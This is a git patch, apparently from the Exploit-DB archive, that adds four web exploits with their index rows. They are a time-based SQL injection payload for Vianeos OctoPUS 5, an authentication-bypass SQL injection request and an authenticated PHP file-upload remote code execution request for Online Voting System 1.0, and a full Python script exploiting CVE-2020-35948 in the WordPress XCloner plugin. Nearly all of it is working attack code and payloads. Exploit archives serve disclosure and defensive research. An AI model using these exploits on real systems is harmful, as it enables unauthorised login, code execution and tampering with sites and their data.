From 4f3cf46cbf78f08a03becfaab6ebaf9f9161ff0d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 2 Jul 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-07-02 4 changes to exploits/shellcodes Online Voting System 1.0 - Authentication Bypass (SQLi) Online Voting System 1.0 - Remote Code Execution (Authenticated) Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated) Vianeos OctoPUS 5 - 'login_user' SQLi --- exploits/multiple/webapps/50078.txt | 19 +++++ exploits/php/webapps/50075.txt | 35 ++++++++ exploits/php/webapps/50076.txt | 76 +++++++++++++++++ exploits/php/webapps/50077.py | 121 ++++++++++++++++++++++++++++ files_exploits.csv | 4 + 5 files changed, 255 insertions(+) create mode 100644 exploits/multiple/webapps/50078.txt create mode 100644 exploits/php/webapps/50075.txt create mode 100644 exploits/php/webapps/50076.txt create mode 100755 exploits/php/webapps/50077.py diff --git a/exploits/multiple/webapps/50078.txt b/exploits/multiple/webapps/50078.txt new file mode 100644 index 000000000..18c35f88f --- /dev/null +++ b/exploits/multiple/webapps/50078.txt @@ -0,0 +1,19 @@ +# Exploit Title: Vianeos OctoPUS 5 - 'login_user' SQLi +# Date: 01/07/2021 +# Exploit Author: Audencia Business SCHOOL +# Vendor Homepage: http://www.vianeos.com/en/home-vianeos/ +# Software Link: http://www.vianeos.com/en/octopus/ +# Version: > V5 +# Tested on: Fedora / Apache2 / MariaDB + + +Octopus V5 SQLi + +The "login_user =" parameter present in the POST authentication request is vulnerable to an Time Based SQLi as follow : + +``` +Parameter: login_user (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: signin_user=1&login_user=1' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))xENj) AND 'OoKG'='OoKG&password_user=1 +``` \ No newline at end of file diff --git a/exploits/php/webapps/50075.txt b/exploits/php/webapps/50075.txt new file mode 100644 index 000000000..bf8bfdd1c --- /dev/null +++ b/exploits/php/webapps/50075.txt @@ -0,0 +1,35 @@ +# Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi) +# Exploit Author: deathflash1411 +# Date 30.06.2021 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html +# Version 1.0 +# Tested on: Ubuntu 20.04 + +#################### +# Proof of Concept # +#################### + +POST /Online_voting_system/admin/ HTTP/1.1 +Host: localhost +Content-Length: 50 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://localhost/Online_voting_system/admin/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a +Connection: close + +UserName=admin&Password=%27+or+%27%27%3D%27&Login= + +########### +# Payload # +########### + +UserName=admin +Password=' or ''=' \ No newline at end of file diff --git a/exploits/php/webapps/50076.txt b/exploits/php/webapps/50076.txt new file mode 100644 index 000000000..1e378bbd2 --- /dev/null +++ b/exploits/php/webapps/50076.txt @@ -0,0 +1,76 @@ +# Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated) +# Exploit Author: deathflash1411 +# Date 30.06.2021 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html +# Version 1.0 +# Tested on: Ubuntu 20.04 + +#################### +# Proof of Concept # +#################### + +POST /Online_voting_system/admin/save_candidate.php HTTP/1.1 +Host: localhost +Content-Length: 1253 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4G9QRpniTS7gPVqW +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://localhost/Online_voting_system/admin/new_candidate.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a +Connection: close + +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="user_name" + +admin +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="rfirstname" + +test +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="rlastname" + +test +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="rgender" + +Male +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="ryear" + +1st year +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="rmname" + +test +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="rposition" + +Governor +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="party" + +test +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="image"; filename="test.php" +Content-Type: application/octet-stream + + + +------WebKitFormBoundary4G9QRpniTS7gPVqW +Content-Disposition: form-data; name="save" + + +------WebKitFormBoundary4G9QRpniTS7gPVqW-- + +######## +# Note # +######## + +Uploaded file will be available at http://localhost/Online_voting_system/admin/upload/ \ No newline at end of file diff --git a/exploits/php/webapps/50077.py b/exploits/php/webapps/50077.py new file mode 100755 index 000000000..174523182 --- /dev/null +++ b/exploits/php/webapps/50077.py @@ -0,0 +1,121 @@ +# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated) +# Date 30.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.xcloner.com/ +# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip +# Version: 4.2.1 - 4.2.12 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2020-35948 +# CWE: CWE-732 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md + +''' +Description: +An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, +including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, +for example. Alternatively, an attacker could create an exploit chain to obtain a database dump. +''' + + +''' +Banner: +''' +banner = """ + + + ##### # # ####### ##### ### ##### ### ##### ####### ##### # ##### + # # # # # # # # # # # # # # # # # # # # # # + # # # # # # # # # # # # # # # # # # + # # # ##### ##### ##### # # ##### # # ##### ##### ###### ###### # # ##### + # # # # # # # # # # # # # ####### # # + # # # # # # # # # # # # # # # # # # # # + ##### # ####### ####### ### ####### ### ##### ##### ##### # ##### + + + + by @Hacker5preme +""" +print(banner) + + +''' +Import required modules: +''' +import requests +import argparse + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH +username = args.USERNAME +password = args.PASSWORD +print('') +ajax_cmd = input('[*] Ajax Command to execute: ') + +''' +Authentication: +''' +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} + +# Authenticate: +print('') +auth = session.post(auth_url, headers=header, data=body) +auth_header= auth.headers['Set-Cookie'] +if 'wordpress_logged_in' in auth_header: + print('[+] Authentication successfull !') +else: + print('[-] Authentication failed !') + exit() + + +''' +Exploit: +''' +url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup" + +header = { + "Accept": "*/*", + "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357", + "Connection": "close" +} + +# Body: +body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd) + +exploit = session.post(url_exploit, headers=header, data=body) +print('') +print(exploit.text) +print('') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8d9dcac83..a750390d9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44207,9 +44207,13 @@ id,file,description,date,author,type,platform,port 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php, 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php, 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php, +50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",2021-07-01,"Salman Asad",webapps,php, 50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php, 50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos, 50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware, 50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php, 50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple, 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple, +50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php, +50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php, +50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,